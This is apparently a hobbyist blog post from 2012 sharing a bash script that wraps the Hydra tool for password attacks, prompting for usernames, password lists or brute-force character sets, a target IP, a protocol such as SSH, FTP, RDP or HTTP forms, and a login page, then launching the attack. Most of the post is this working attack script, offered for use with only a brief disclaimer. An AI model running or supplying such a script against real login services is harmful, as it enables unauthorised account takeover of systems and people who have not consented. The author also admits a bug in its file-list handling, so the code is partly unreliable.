Hydra bruteforce and dictonary attack script

It is a script to make password attacks alot easier for people. It can do either bruteforcing or dictonairy attacks.

I spent all morning learning how to code this and i wanted to share it with everyone, I couldnt find a section in the forums for scripts but i noticed there was alot of script in this section so i chose to post here (please move if it the wrong section).

version 0.1

  • It can do a dictonary attack
  • It can bruteforce
  • It can use a single username or a list of usernames
  • You can choose how many tasks to run simultanouisly
  • You can choose the timeout time
  • You can choose the wabpage to attack

version 0.2

  • Fixed a problem in the if statment that executed the final command to run hydra. It was stoping the script working if you had picked password option 1 or 2.
  • New issue when choosing the option to use text files the script turns the ‘ into / so it messes up the script. looking for a fix, does anyone know one?

Things i want to do

  • Add in error detection incase user enters wrong info
  • More options to define the attack

COPY PASTE SCRIPT INTO NOTEPAD AND SAVE AS ATTACK.SH

Code:
#!/bin/bash
# PLEASE READ AND STUDY BEFORE LAUNCHING

# --------------------------------------------------------------------------------------------------------------------#
# v0.2 17.06.2012
#
# Copyright (C) 2012  Deviney

# This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public 
# License as published by the Free Software Foundation; either version 2 of the License, or any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied 
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
# --------------------------------------------------------------------------------------------------------------------#

# Disclaimer:   This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
#               I sincerely hope skiddies find it overwhelming. (not very likely tho)


#  ===========================================================================================  #
# 				  "...On The Shoulders Of Giants..."                                            #
#  =================
==========================================================================  #

# 		Large chunks copied directly from VulpiArgenti's PwnSTAR script                            #
#										                                                        #
#		I only used parts that made the script look user frendly the code
#		that does the the work is my own or has been edited to do a diffrent job.

#  ===========================================================================================  #

# Thanks to VulpiArgenti i used his code as a learning base



# ~~~~~~~~~~  Environment Setup ~~~~~~~~~~ #
# Text color variables - saves retyping these awful ANSI codes

txtrst="\e[0m"      # Text reset

def="\e[1;34m"	    # default 		   blue
warn="\e[1;31m"     # warning		   red
info="\e[1;34m" 	# info             blue
q="\e[1;32m"		# questions        green
inp="\e[1;36m"	    # input variables  magenta

### 7 characters = 120 pixels?
var=$(ls /etc | grep kde4)          # detect KDE
if [[ -z $var ]];then
    resize -s 38 85 &> /dev/null    # resize the terminal if gnome, not KDE
fi

echo -e "\e[0;40m"      # background black
clear

# ~~~~~~~~~~ Intro ~~~~~~~~~~ #

banner_fn()
{
	echo -e "\e[1;37m 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Deviney~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                              
                  
                                                                                                                  
    *                    **                                  *******      *                    *           
  **          *           **                               *       ***  **                   **            
  **         ***          **                              *         **  **                   **            
  **          *           **                              **        *   **                   **            
  **                      **   ***  ****                   ***          **           ****    **            
  **  ***   ***       *** **    **** **** *    ****       ** ***        **  ***     * ***  * **  ***       
  ** * ***   ***     *********   **   ****    * ***  *     *** ***      ** * ***   *   ****  ** * ***      
  ***   ***   **    **   ****    **          *   ****        *** ***    ***   *** **    **   ***   *       
  **     **   **    **    **     **         **    **           *** ***  **     ** **    **   **   *        
  **     **   **    **    **     **         **    **             ** *** **     ** **    **   **  *         
  **     **   **    **    **     **         **    **              ** ** **     ** **    **   ** **         
  **     **   **    **    **     **         **    **               * *  **     ** **    **   ******        
  **     **   **    **    **     ***        **    **     ***        *   **     **  ******    **  ***       
  **     **   *** *  *****        ***        ***** **   *  *********    **     **   ****     **   *** *    
   **    **    ***    ***                     ***   ** *     *****       **    **             **   ***     
       *                                             *                       *                           
      *                                               **                    *                            
     *                                                                     *                             
    *                                                                     *                             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Hydro_Password_Hack_Script_V_0.2~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

"
}

username_options_fn()
{	
sleep 2
	# Trap Ctrl-C
	trap exit_fn INT 
	
    username_options=
    echo -e "$info Press ctrl-C at any time to exit neatly\n"
    sleep 1
	echo -e "$q Are we using a a single username or a username list? (list has to be text file)"
    sleep 0.5
    echo -e "$def
	
    1) A single username

	
    2) A username list (text file)

    
    q) Exit from the script
	
	"

read username_options
	if [[ $username_options = q ]];then
		exit_fn
    elif [[ $username_options = 1 ]];then
        sin_user_fn
    else
	list_user_fn
    fi
    
}

sin_user_fn()
{
clear
banner_fn
usernamesign=
: ${usernamesign:="-l "}
echo -e "$q What is the username we will be using?"
read username
password_options_fn
}

list_user_fn()
{
clear
banner_fn
usernamesign= 
: ${usernamesign:="-L "}
echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
read username
password_options_fn
}

password_options_fn()
{
clear
banner_fn
    password_options=
	echo -e "$q Are we using a a single password or a password list? (list has to be text file)"
    sleep 0.5
    echo -e "$def
	
    1) A single password

	
    2) A password list (text file)


    3) A Bruteforce attack
    
    q) Exit from the script
	
	"
    read password_options
    if [[ $password_options = q ]];then
		exit_fn
    elif [[ $password_options = 1 ]];then
        sin_password_fn
    elif [[ $password_options = 2 ]];then
	list_password_fn
    else
	bruteforce_password_fn
    fi
    
}

sin_password_fn()
{
clear
banner_fn
passwordsign= 
: ${passwordsign:="-p "}
echo -e "$q What is the password we will be using?"
read password
Task_fn
}

list_password_fn()
{
clear
banner_fn
passwordsign= 
: ${passwordsign:="-P "}
echo -e "$q What is the path to your password list? (E.g root/PasswordList.txt"
read password
Task_fn
}

bruteforce_password_fn()
{
clear
banner_fn
brute_min=
brute_max=
brute_char= 
: ${passwordsign:="-x"}
: ${passwordsignbreak:=":"}
echo -e "$q What is the min amount of charchters in the password?"
read brute_min
echo -e "$q What is the max amount of charchters in the password?"
read brute_max
echo -e "$q What charcters will be bruteforced? (do not use any space's E.G 'abcdefghi.@123'"
read brute_char
Task_fn
}

Task_fn()
{
clear
banner_fn
task=
echo -e "$q How many parallel connections would you like? (suggest 1-32)"
read task
timeout_fn
}

timeout_fn()
{
clear
banner_fn
timeout=
echo -e "$q How long would you like a connection to wait before being classed as timed out? (suggest 5-30)"
read timeout
ip_address_fn
}

ip_address_fn()
{
clear
banner_fn
ip=
echo -e "$q What is the ip of the target?"
read ip
protcol_fn
}

protcol_fn()
{
clear
banner_fn
protcol=
echo -e " $q What protcol will you be using?? (Enter 'show' to see the protcols available)"
read protcol
if [[ $protcol = show ]];then
show_protcols_fn
else
webpage_fn
fi
}

show_protcols_fn()
{
clear
banner_fn
echo -e "AFP,			Cisco AAA,		 Cisco auth,	 	Cisco enable"
echo -e "CVS,	 		Firebird,		 FTP, 			HTTP-FORM-GET"
echo -e "HTTP-FORM-POST, 	HTTP-GET,		 HTTP-HEAD, 		HTTP-PROXY"
echo -e "HTTPS-FORM-GET,	HTTPS-FORM-POST,	 HTTPS-GET, 		HTTPS-HEAD"
echo -e "HTTP-Proxy, 		ICQ,     		 IMAP, 			IRC"
echo -e "LDAP, 			MS-SQL,			 MYSQL, 		NCP"
echo -e "NNTP, 			Oracle Listener,	 Oracle, 		Oracle SID"
echo -e "PC-Anywhere, 		PCNFS,			 POP3, 			POSTGRES"
echo -e "RDP, 			Rexec, 			 Rlogin, 		Rsh"
echo -e "SAP/R3, 		SIP, 			 SMB, 			SMTP"
echo -e "SMTP Enum, 		SNMP,			 SOCKS5, 		SSH (v1 and v2)"
echo -e "Subversion, 		Teamspeak (TS2),	 Telnet, 		VMware-Auth"
echo -e "VNC,			XMPP"
echo -e ""
echo -e "Press enter to return back to the prevouise question"
read
protcol_fn
}

webpage_fn()
{
clear
banner_fn
webpage=
echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a backslash '/'"
read webpage
execute_fn
}

execute_fn()
{
clear
banner_fn
 if [[ $password_options = [1-2] ]];then
	echo -e "$warn hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
	hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage
    elif [[ $password_options = 3 ]];then
        echo -e "$warn hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
	hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage
fi
}

exit_fn()
{
clear
exit 0
}

# ~~~~~~~~~~ Main Script 2 lines!!! ~~~~~~~~~~ #

banner_fn
username_options_fn
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s